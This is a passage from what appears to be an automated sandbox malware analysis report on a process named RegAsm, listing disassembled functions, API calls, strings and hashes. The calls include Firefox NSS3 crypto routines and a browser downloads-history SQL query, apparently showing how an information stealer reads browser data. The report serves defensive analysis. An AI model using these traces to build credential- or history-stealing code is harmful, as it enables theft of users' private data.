                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                • API String ID: 3193997572-2241552939
                                                                                • Opcode ID: 4bafbb6a6d366c1abf6568586283c581c43a36d2cdaff67a2810fc17a686afab
                                                                                • Instruction ID: 1d83a0d3a3a48fb3eb3ae61e75267720847f9aac3d0a0fe70c8d3f25524eebd0
                                                                                • Opcode Fuzzy Hash: 4bafbb6a6d366c1abf6568586283c581c43a36d2cdaff67a2810fc17a686afab
                                                                                • Instruction Fuzzy Hash: 74B15D71904248EADB15EBE5D956BDDBBB4AF18308F50407EE406725C2DF782B0CCB26
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: __allrem
                                                                                • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                • API String ID: 2933888876-3221253098
                                                                                • Opcode ID: 282b1c7f8b912b341f7d165770c59c385632c13f80c747ff966193d6d44ccb62
                                                                                • Instruction ID: f8586a4e9f21cf858b78bf99f3b35300a53bfdd82fbeeb11cca187b0d45f7ecb
                                                                                • Opcode Fuzzy Hash: 282b1c7f8b912b341f7d165770c59c385632c13f80c747ff966193d6d44ccb62
                                                                                • Instruction Fuzzy Hash: 3461A471B003099FDB24CF68DD54A6A7BB1FF49314F148528E91AAB7C0DB39E846CB91
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040F39C
                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040F3BD
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1E2
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F1F8
                                                                                  • Part of subcall function 0040F1D6: strlen.MSVCRT ref: 0040F291
                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040F3EA
                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040F4B4
                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040F4C5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$QueryVirtual
                                                                                • String ID: @
                                                                                • API String ID: 3099930812-2766056989
                                                                                • Opcode ID: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                • Instruction ID: 466afe4c3685285f2ebe0489a4595054022d0f09b2a7b9cf482a5e365b85556b
                                                                                • Opcode Fuzzy Hash: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
                                                                                • Instruction Fuzzy Hash: 36416971A00109AFEF24DE90CD45AEF7BB6EB98354F14803AF901B2190D7798E54DBA8
                                                                                APIs
                                                                                • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C91AB3E,?,?,?), ref: 6C91AC35
                                                                                  • Part of subcall function 6C8FCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8FCF16
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C91AB3E,?,?,?), ref: 6C91AC55
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C91AB3E,?,?), ref: 6C91AC70
                                                                                  • Part of subcall function 6C8FE300: TlsGetValue.KERNEL32 ref: 6C8FE33C
                                                                                  • Part of subcall function 6C8FE300: EnterCriticalSection.KERNEL32(?), ref: 6C8FE350
                                                                                  • Part of subcall function 6C8FE300: PR_Unlock.NSS3(?), ref: 6C8FE5BC
                                                                                  • Part of subcall function 6C8FE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C8FE5CA
                                                                                  • Part of subcall function 6C8FE300: TlsGetValue.KERNEL32 ref: 6C8FE5F2
                                                                                  • Part of subcall function 6C8FE300: EnterCriticalSection.KERNEL32(?), ref: 6C8FE606
                                                                                  • Part of subcall function 6C8FE300: PORT_Alloc_Util.NSS3(?), ref: 6C8FE613
                                                                                • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C91AC92
                                                                                • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C91AB3E), ref: 6C91ACD7
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C91AD10
                                                                                • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C91AD2B
                                                                                  • Part of subcall function 6C8FF360: TlsGetValue.KERNEL32(00000000,?,6C91A904,?), ref: 6C8FF38B
                                                                                  • Part of subcall function 6C8FF360: EnterCriticalSection.KERNEL32(?,?,?,6C91A904,?), ref: 6C8FF3A0
                                                                                  • Part of subcall function 6C8FF360: PR_Unlock.NSS3(?,?,?,?,6C91A904,?), ref: 6C8FF3D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                • String ID:
                                                                                • API String ID: 2926855110-0
                                                                                • Opcode ID: 6192a47334131936451663beb287be34aee58537f347b5b84964e45ca2459cd5
                                                                                • Instruction ID: a0f9cb0a3e837695a26b285e70c9a158e238f226275398d1e757e9ad1a416a1c
                                                                                • Opcode Fuzzy Hash: 6192a47334131936451663beb287be34aee58537f347b5b84964e45ca2459cd5
                                                                                • Instruction Fuzzy Hash: 79312BB1E0461A5FEB008F69CC419AF777AAF94728B188528E8149BB41EF31DD19C7A1
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004114F3
                                                                                • strtok_s.MSVCRT ref: 0041151E
                                                                                • StrCmpCA.SHLWAPI(00000000,0042655C,00000001,?,?,?,00000000), ref: 00411561
                                                                                • StrCmpCA.SHLWAPI(00000000,00426558,00000001,?,?,?,00000000), ref: 0041158F
                                                                                • StrCmpCA.SHLWAPI(00000000,00426554,00000001,?,?,?,00000000), ref: 004115B4
                                                                                • StrCmpCA.SHLWAPI(00000000,00426550,00000001,?,?,?,00000000), ref: 004115E5
                                                                                • strtok_s.MSVCRT ref: 0041161B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1158113254-0
                                                                                • Opcode ID: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
                                                                                • Instruction ID: 68ea9c5229acb73eb4f6ce9ce1e3a2e95253cdc2d87cf327e38e290520796c14
                                                                                • Opcode Fuzzy Hash: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
                                                                                • Instruction Fuzzy Hash: 4B41AF70A00106EBDB14CF64DD81BEAB7E8BB58315F10052FE206E66A1DB3CCA858B59
                                                                                APIs
                                                                                • PR_Now.NSS3 ref: 6C8F8C7C
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8F8CB0
                                                                                • TlsGetValue.KERNEL32 ref: 6C8F8CD1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8F8CE5
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F8D2E
                                                                                • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C8F8D62
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F8D93
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                • String ID:
                                                                                • API String ID: 3131193014-0
                                                                                • Opcode ID: 50ed4940f791bb47e9362a346ff99a9d401d11922ead6d0471d213753888fe23
                                                                                • Instruction ID: eec728f3c0964ad3695c312b968f637eec2fe011a5ddc637bf4770ad276325ef
                                                                                • Opcode Fuzzy Hash: 50ed4940f791bb47e9362a346ff99a9d401d11922ead6d0471d213753888fe23
                                                                                • Instruction Fuzzy Hash: 54318C71A01205AFE720AF69CD407AAB770BF26358F140536EA2967B50D730E926C7E1
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C8EE728,?,00000038,?,?,00000000), ref: 6C8F2E52
                                                                                • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8F2E66
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8F2E7B
                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6C8F2E8F
                                                                                • PL_HashTableLookup.NSS3(?,?), ref: 6C8F2E9E
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2EAB
                                                                                • PR_Unlock.NSS3(?), ref: 6C8F2F0D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                • String ID:
                                                                                • API String ID: 3106257965-0
                                                                                • Opcode ID: 1d1150007507415326338f9badfa0458c2166390c9fed5e08104e829e514b8c2
                                                                                • Instruction ID: d64bf537c6db0637aa8c971fba65305345bc27ec3c6a42012b056d9d1e2bcc6d
                                                                                • Opcode Fuzzy Hash: 1d1150007507415326338f9badfa0458c2166390c9fed5e08104e829e514b8c2
                                                                                • Instruction Fuzzy Hash: 553137B5A00645ABEB209F28DD448B6B778EF56298B188934EC1883B11F735DC65C7E1
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?,6C93CD93,?), ref: 6C93CEEE
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C93CD93,?), ref: 6C93CEFC
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C93CD93,?), ref: 6C93CF0B
                                                                                  • Part of subcall function 6C930840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9308B4
                                                                                • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C93CD93,?), ref: 6C93CF1D
                                                                                  • Part of subcall function 6C92FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C928D2D,?,00000000,?), ref: 6C92FB85
                                                                                  • Part of subcall function 6C92FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C92FBB1
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF47
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF67
                                                                                • SECITEM_CopyItem_Util.NSS3(?,00000000,6C93CD93,?,?,?,?,?,?,?,?,?,?,?,6C93CD93,?), ref: 6C93CF78
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                • String ID:
                                                                                • API String ID: 4291907967-0
                                                                                • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                • Instruction ID: 8aeb78b8cca883b7237caf64d2bab9cb61bb18adf706031dcb6c196a10402d25
                                                                                • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                • Instruction Fuzzy Hash: 4211E4B9E007306BEB00AA667C41B6BB5EC9F6564DF005139EC0DD7741FB60D91886B1
                                                                                APIs
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F84F3
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F850A
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F851E
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F855B
                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F856F
                                                                                • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F85AC
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F767F
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F7693
                                                                                  • Part of subcall function 6C7F7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C7F85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F76A7
                                                                                • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C7F85B2
                                                                                  • Part of subcall function 6C7D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C7D5EDB
                                                                                  • Part of subcall function 6C7D5E90: memset.VCRUNTIME140(6C817765,000000E5,55CCCCCC), ref: 6C7D5F27
                                                                                  • Part of subcall function 6C7D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C7D5FB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                • String ID:
                                                                                • API String ID: 2666944752-0
                                                                                • Opcode ID: 8381ea261d35421a4bd3d7fee685bf042098e152d281d617894526add99b3abb
                                                                                • Instruction ID: df57fa6152dc8d4ec771b0fb50a789f13857bd60837f4c8cf82ddd10087ae055
                                                                                • Opcode Fuzzy Hash: 8381ea261d35421a4bd3d7fee685bf042098e152d281d617894526add99b3abb
                                                                                • Instruction Fuzzy Hash: CC21EF752006018FDB24DB29C8C8A5AB7B4AF4130CF24093CE56BC7B41DB34F949CB80
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C8E8C1B
                                                                                • EnterCriticalSection.KERNEL32 ref: 6C8E8C34
                                                                                • PL_ArenaAllocate.NSS3 ref: 6C8E8C65
                                                                                • PR_Unlock.NSS3 ref: 6C8E8C9C
                                                                                • PR_Unlock.NSS3 ref: 6C8E8CB6
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                • String ID: KRAM
                                                                                • API String ID: 4127063985-3815160215
                                                                                • Opcode ID: 27cb04b2ac612ca51bde536317b8a1d1cfd4dde5a87ed92861a7331be9b353d0
                                                                                • Instruction ID: 4aa76d46290ac83e707c4a50fdeb3c807bad9d6cf20c1b333f55ef6d81ffb56f
                                                                                • Opcode Fuzzy Hash: 27cb04b2ac612ca51bde536317b8a1d1cfd4dde5a87ed92861a7331be9b353d0
                                                                                • Instruction Fuzzy Hash: 392180B1605A058FD750AF7CC58456DBBF4FF4A308F06896AD8888B711EB35D886CB92
                                                                                APIs
                                                                                • PR_EnterMonitor.NSS3 ref: 6C9E2CA0
                                                                                • PR_ExitMonitor.NSS3 ref: 6C9E2CBE
                                                                                • calloc.MOZGLUE(00000001,00000014), ref: 6C9E2CD1
                                                                                • strdup.MOZGLUE(?), ref: 6C9E2CE1
                                                                                • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C9E2D27
                                                                                Strings
                                                                                • Loaded library %s (static lib), xrefs: 6C9E2D22
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                • String ID: Loaded library %s (static lib)
                                                                                • API String ID: 3511436785-2186981405
                                                                                • Opcode ID: 4dd7526521388464261dad98a1b62b95371d27b233d83ecd4ab3639da618bae8
                                                                                • Instruction ID: 68cdf309109b7ac8481c819f5d988dc5869e41fb0212239897077511a60aeaa1
                                                                                • Opcode Fuzzy Hash: 4dd7526521388464261dad98a1b62b95371d27b233d83ecd4ab3639da618bae8
                                                                                • Instruction Fuzzy Hash: 6A11EEB07007068FEB298F19DC44AA677B9AF6A30DB18C52DD909C6B01D731D849CBA1
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                • PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C9998D0: calloc.MOZGLUE(00000001,00000084,6C8C0936,00000001,?,6C8C102C), ref: 6C9998E5
                                                                                • PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • TlsGetValue.KERNEL32(00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931044
                                                                                • free.MOZGLUE(00000000,?,00000800,6C8CEF74,00000000), ref: 6C931064
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                • String ID: security
                                                                                • API String ID: 3379159031-3315324353
                                                                                • Opcode ID: 72dda1182fe72708bb29d1612b3433adaa1520b5dd516b0440ca00033bc6e6e6
                                                                                • Instruction ID: c53161ba68fa027d12d4ee4e7fc1ae9a5f5a10e8adb8d984c6e1574ba2373f3d
                                                                                • Opcode Fuzzy Hash: 72dda1182fe72708bb29d1612b3433adaa1520b5dd516b0440ca00033bc6e6e6
                                                                                • Instruction Fuzzy Hash: 14014870740270DBE7202F3C9C056563668BF13788F055626E80CD6A61EB78C155DBD2
                                                                                APIs
                                                                                • memset.VCRUNTIME140(?,00000000,00000140), ref: 6C95AFF4
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C95B02F
                                                                                  • Part of subcall function 6C95EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C95EE85
                                                                                  • Part of subcall function 6C95EE50: realloc.MOZGLUE(DA5D7AA7,?), ref: 6C95EEAE
                                                                                  • Part of subcall function 6C95EE50: PORT_Alloc_Util.NSS3(?), ref: 6C95EEC5
                                                                                  • Part of subcall function 6C95EE50: htonl.WSOCK32(?), ref: 6C95EEE3
                                                                                  • Part of subcall function 6C95EE50: htonl.WSOCK32(00000000,?), ref: 6C95EEED
                                                                                  • Part of subcall function 6C95EE50: memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C95EF01
                                                                                  • Part of subcall function 6C95EF30: PR_SetError.NSS3(FFFFE013,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EF6D
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C95B2F7
                                                                                  • Part of subcall function 6C95EF30: htonl.WSOCK32(00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EFE4
                                                                                  • Part of subcall function 6C95EF30: htonl.WSOCK32(?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95EFF1
                                                                                  • Part of subcall function 6C95EF30: memcpy.VCRUNTIME140(?,?,6C97A4A1,?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95F00B
                                                                                  • Part of subcall function 6C95EF30: memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C97A4A1,?,00000000,?,00000001), ref: 6C95F027
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,?,?,?,000003E8,00000000), ref: 6C95B339
